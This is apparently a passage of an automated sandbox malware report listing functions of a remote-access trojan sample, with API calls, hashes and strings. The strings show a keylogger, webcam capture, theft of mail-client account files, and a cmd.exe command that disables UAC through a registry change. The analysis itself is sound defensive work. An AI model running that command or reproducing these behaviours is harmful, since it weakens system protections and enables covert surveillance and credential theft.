                                                                                                                                                                                          • Opcode Fuzzy Hash: 6432c744e00329bb486b15d835566ca43a09715d1a124345af01da605e15d9f5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2841D1B2A00605BFD7349F6CCC49B6ABFA9FB88710F10856BF155DB791E671DA008B81
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1234B68A Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 91COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 1234361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,123A50E4), ref: 1234363D
                                                                                                                                                                                            • Part of subcall function 1234361B: RegQueryValueExW.ADVAPI32(?,1233F313,00000000,00000000,?,00000400), ref: 1234365C
                                                                                                                                                                                            • Part of subcall function 1234361B: RegCloseKey.ADVAPI32(?), ref: 12343665
                                                                                                                                                                                            • Part of subcall function 1234BFB7: GetCurrentProcess.KERNEL32(?,?,?,1233DAAA,WinDir,00000000,00000000), ref: 1234BFC8
                                                                                                                                                                                            • Part of subcall function 1234BFB7: IsWow64Process.KERNEL32(00000000,?,?,1233DAAA,WinDir,00000000,00000000), ref: 1234BFCF
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 1234B763
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                                                                          • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                                                                          • API String ID: 3286818993-4246244872
                                                                                                                                                                                          • Opcode ID: a0a195e70e19f37911e2ffc13e7bcc3b4f60af3f9d3e58b5afbbb9a1a7f7d47f
                                                                                                                                                                                          • Instruction ID: 4bd9d132ea1a89a84f551a5f17fa98b2471b40ff57ce4414c75c4b523805af8d
                                                                                                                                                                                          • Opcode Fuzzy Hash: a0a195e70e19f37911e2ffc13e7bcc3b4f60af3f9d3e58b5afbbb9a1a7f7d47f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2021AD77A002046BDF69AA748C90DFE77AD9F49325F10057DE406E7280FE29BE098360
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 146411EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 14641E89: lstrlenW.KERNEL32(?,?,?,?,?,146410DF,?,?,?,00000000), ref: 14641E9A
                                                                                                                                                                                            • Part of subcall function 14641E89: lstrcatW.KERNEL32(?,?), ref: 14641EAC
                                                                                                                                                                                            • Part of subcall function 14641E89: lstrlenW.KERNEL32(?,?,146410DF,?,?,?,00000000), ref: 14641EB3
                                                                                                                                                                                            • Part of subcall function 14641E89: lstrlenW.KERNEL32(?,?,146410DF,?,?,?,00000000), ref: 14641EC8
                                                                                                                                                                                            • Part of subcall function 14641E89: lstrcatW.KERNEL32(?,146410DF), ref: 14641ED3
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1464122A
                                                                                                                                                                                            • Part of subcall function 1464173A: _strlen.LIBCMT ref: 14641855
                                                                                                                                                                                            • Part of subcall function 1464173A: _strlen.LIBCMT ref: 14641869
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                          • API String ID: 4036392271-1520055953
                                                                                                                                                                                          • Opcode ID: 966d485200a2239398ebe44187cbf1bbefbb202e84cde8a8ac94b099c4be3e75
                                                                                                                                                                                          • Instruction ID: dae16f3efda7ecc6530abdd17d49243dffa4c5060fc256e682acac30af85e974
                                                                                                                                                                                          • Opcode Fuzzy Hash: 966d485200a2239398ebe44187cbf1bbefbb202e84cde8a8ac94b099c4be3e75
                                                                                                                                                                                          • Instruction Fuzzy Hash: CE21A77DE10218ABEB109790EC85FEE7339EF50758F140556F604EB1D0EAB16E81875D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 1233B172
                                                                                                                                                                                          • wsprintfW.USER32 ref: 1233B1F3
                                                                                                                                                                                            • Part of subcall function 1233A636: SetEvent.KERNEL32(?,?,00000000,1233B20A,00000000), ref: 1233A662
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EventLocalTimewsprintf
                                                                                                                                                                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                                                                                          • API String ID: 1497725170-248792730
                                                                                                                                                                                          • Opcode ID: bd92c863d70edc1c03bde9f74957145220356c093c788fcffcde923185aae8d8
                                                                                                                                                                                          • Instruction ID: 572f19df1fc59faa4015c5f11cc6416a871ef325a5e1068b8d4ab05e8b11d4ee
                                                                                                                                                                                          • Opcode Fuzzy Hash: bd92c863d70edc1c03bde9f74957145220356c093c788fcffcde923185aae8d8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1911B97B400118AACB69DB94DC908FF77BCEE48312B00021EF446A6190FF38BF46C6A4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12337755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 1233779B
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 123377AA
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 123377AF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 12337791
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe, xrefs: 12337796
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                                                          • API String ID: 2922976086-4183131282
                                                                                                                                                                                          • Opcode ID: 4f594107cc6cc3ddb4122109f47d6d2b27aaa1742590ee73bb47f832f5d4bb26
                                                                                                                                                                                          • Instruction ID: db5f5ab50eadf6b3136fb89ae876f2904eb8e2b12477d547735d22be03a3549e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f594107cc6cc3ddb4122109f47d6d2b27aaa1742590ee73bb47f832f5d4bb26
                                                                                                                                                                                          • Instruction Fuzzy Hash: A9F06DB6D401AC7ACB20AAD69C08EEF7F7CEBC2B11F00052AFA08A6144D6306100CAB1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12337260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Rmc-W5UGP5, xrefs: 123376DA
                                                                                                                                                                                          • C:\Users\Public\Libraries\wkrriuhD.pif, xrefs: 123376C4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: C:\Users\Public\Libraries\wkrriuhD.pif$Rmc-W5UGP5
                                                                                                                                                                                          • API String ID: 0-3420714671
                                                                                                                                                                                          • Opcode ID: cd63176604227bbf103403694a5eccd81afbb280b8f62e4011ce23a92dc9dee5
                                                                                                                                                                                          • Instruction ID: 4fb4225256e4544b76e7403321c8a00414b4ce6faf789d92f028006b3c6c33aa
                                                                                                                                                                                          • Opcode Fuzzy Hash: cd63176604227bbf103403694a5eccd81afbb280b8f62e4011ce23a92dc9dee5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 41F0F0BB691261AFCA0F666448687AC3E6DA7C1783F800A3AE447DA280EB604600C751
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 14644B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,14644AEA,?,?,14644A8A,?,14652238,0000000C,14644BBD,00000000,00000000), ref: 14644B59
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 14644B6C
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,14644AEA,?,?,14644A8A,?,14652238,0000000C,14644BBD,00000000,00000000,00000001,14642082), ref: 14644B8F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                          • Opcode ID: 23e48c31f0012cb9a96a55eba783012b9d87ecda6115084ba1d09dc950a9493d
                                                                                                                                                                                          • Instruction ID: 841ca2c0d54ed72418b633bae9bf1bf6d06afa0cad186d556f9be628957f527c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 23e48c31f0012cb9a96a55eba783012b9d87ecda6115084ba1d09dc950a9493d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 73F04F31E00218BBDF219F90DC49F9DBFBDEF64659F284168F905A7250DB319942CA91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1237333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,123732EB,?,?,1237328B,?), ref: 1237335A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 1237336D
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,123732EB,?,?,1237328B,?), ref: 12373390
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                          • Opcode ID: 53849b21566e00baa2081110bd72a81689ba55b1140b6ce15d8a8d0340ef6b7f
                                                                                                                                                                                          • Instruction ID: 233972142650ff92259a38f1f663a9a20d4bc52eb94c199722d1cc451be79bab
                                                                                                                                                                                          • Opcode Fuzzy Hash: 53849b21566e00baa2081110bd72a81689ba55b1140b6ce15d8a8d0340ef6b7f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F04475A4111CFBDF119FA0CC49BEDBFB9EF84356F114668F809AA240DB749A40DA90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 123350E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,123A4EF8,12334E7A,00000001,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?), ref: 12335120
                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?), ref: 1233512C
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?), ref: 12335137
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?), ref: 12335140
                                                                                                                                                                                            • Part of subcall function 1234B4EF: GetLocalTime.KERNEL32(00000000), ref: 1234B509
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                                          • String ID: KeepAlive | Disabled
                                                                                                                                                                                          • API String ID: 2993684571-305739064
                                                                                                                                                                                          • Opcode ID: 0e21fb6f05a0b5f4f4a832a948e850018fc5b545a4e91a880d209c5fc51787a9
                                                                                                                                                                                          • Instruction ID: e7de4af83b8b696824fa9212f14626e9c555d3fcaf94268b0c32588c5733a3f1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e21fb6f05a0b5f4f4a832a948e850018fc5b545a4e91a880d209c5fc51787a9
                                                                                                                                                                                          • Instruction Fuzzy Hash: A0F0B4B7C543107FEF223B748D49ABE7FADAB46312F000A59F883827A1D9719951CB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407E90 Relevance: 7.8, Strings: 6, Instructions: 263COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: ($+INF$+NAN$-INF$-NAN$G
                                                                                                                                                                                          • API String ID: 0-2347845670
                                                                                                                                                                                          • Opcode ID: df386413db5f5bc60be4908ccbe3db412de4ebb9e4581173f80f7e4dbf1d03c9
                                                                                                                                                                                          • Instruction ID: 0041924b5d9d70f3b4af34cad832b0d938c96d2f38d4875f295b94107e5b0489
                                                                                                                                                                                          • Opcode Fuzzy Hash: df386413db5f5bc60be4908ccbe3db412de4ebb9e4581173f80f7e4dbf1d03c9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 58816031D081959BDF228A6888C07AB3F919F56310F1941BFE8D56B3C1CA7D8D09C39B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00408194 Relevance: 7.7, Strings: 6, Instructions: 242COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: ($+INF$+NAN$-INF$-NAN$G
                                                                                                                                                                                          • API String ID: 0-2347845670
                                                                                                                                                                                          • Opcode ID: 5defa071b344468966e8f21992e091caac449c0c4bd61bf6e6264df9a7e114d1
                                                                                                                                                                                          • Instruction ID: e6fb385a06b2e9920547bfa33233a82a7c57b8ed9fcdbdb3d0a1a4ef79059717
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5defa071b344468966e8f21992e091caac449c0c4bd61bf6e6264df9a7e114d1
                                                                                                                                                                                          • Instruction Fuzzy Hash: AB81BD7291021597CB20AF48DA813AB73A1EFA4710F14917FDC856B3C5EB7D8982C79E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1237139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5534a7712bd8acbaa51a057818a33d663e07d762aace7220e9a9b443788d6ad2
                                                                                                                                                                                          • Instruction ID: adb7705efc320a77dc1f239db63ed97e721318946ce0c6584634af74f67994ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5534a7712bd8acbaa51a057818a33d663e07d762aace7220e9a9b443788d6ad2
                                                                                                                                                                                          • Instruction Fuzzy Hash: F571C277A002579BCF25CF94C884AEEBBBAEF41764F150329E4926B180D7749945CBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12334371 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 206sleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNEL32(00000000,1233D262), ref: 123344C4
                                                                                                                                                                                            • Part of subcall function 12334607: __EH_prolog.LIBCMT ref: 1233460C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prologSleep
                                                                                                                                                                                          • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                                                                                                                          • API String ID: 3469354165-3547787478
                                                                                                                                                                                          • Opcode ID: a53768b433ec7554020355c2ae302eb382cfee8ed5e3890200f44cc00bed5902
                                                                                                                                                                                          • Instruction ID: a96c744d4f3ecddf100824f8a99b5f224bfe7a2608ea433488ab6e40a0e1c72c
                                                                                                                                                                                          • Opcode Fuzzy Hash: a53768b433ec7554020355c2ae302eb382cfee8ed5e3890200f44cc00bed5902
                                                                                                                                                                                          • Instruction Fuzzy Hash: DD512A7FF043245BD6A6DB34C854ABE37A9EB81752F000628E946876D0DF31AF05C392
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005D5ADD Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                          • Opcode ID: d775a197f71d536e5d52874a7a30662ad33d8ad4d8240f212ad1ffb4432d1cba
                                                                                                                                                                                          • Instruction ID: efef15efacd50fd81b4e319406da5ae0a8bbf017acc72d7e1fa5544143dd46c7
                                                                                                                                                                                          • Opcode Fuzzy Hash: d775a197f71d536e5d52874a7a30662ad33d8ad4d8240f212ad1ffb4432d1cba
                                                                                                                                                                                          • Instruction Fuzzy Hash: 11519D71A11B09AFEB30DF69D841A6A7BF4FB58720F14456BE80AD7360F735AE418B40
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12379365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,1238F234), ref: 123793CF
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,123A2764,000000FF,00000000,0000003F,00000000,?,?), ref: 12379447
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,123A27B8,000000FF,?,0000003F,00000000,?), ref: 12379474
                                                                                                                                                                                          • _free.LIBCMT ref: 123793BD
                                                                                                                                                                                            • Part of subcall function 12376782: RtlFreeHeap.NTDLL(00000000,00000000,?,12380C6F,?,00000000,?,00000000,?,12380F13,?,00000007,?,?,1238145E,?), ref: 12376798
                                                                                                                                                                                            • Part of subcall function 12376782: GetLastError.KERNEL32(?,?,12380C6F,?,00000000,?,00000000,?,12380F13,?,00000007,?,?,1238145E,?,?), ref: 123767AA
                                                                                                                                                                                          • _free.LIBCMT ref: 12379589
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1286116820-0
                                                                                                                                                                                          • Opcode ID: aa1f5272f45c70243794974ae07828d6c9eea462e0e8bf93315b9b35cc68aea4
                                                                                                                                                                                          • Instruction ID: a8d420e18f08df16f4252e28f1ab6b4d7d2f7c1d7eca179fcc18c5cbbb9e2ce5
                                                                                                                                                                                          • Opcode Fuzzy Hash: aa1f5272f45c70243794974ae07828d6c9eea462e0e8bf93315b9b35cc68aea4
                                                                                                                                                                                          • Instruction Fuzzy Hash: BB51A7B7900269AFCF10DFA48C849EAB7BCEF84360B11077AE554D7281E7389A41DB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005D4BDB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
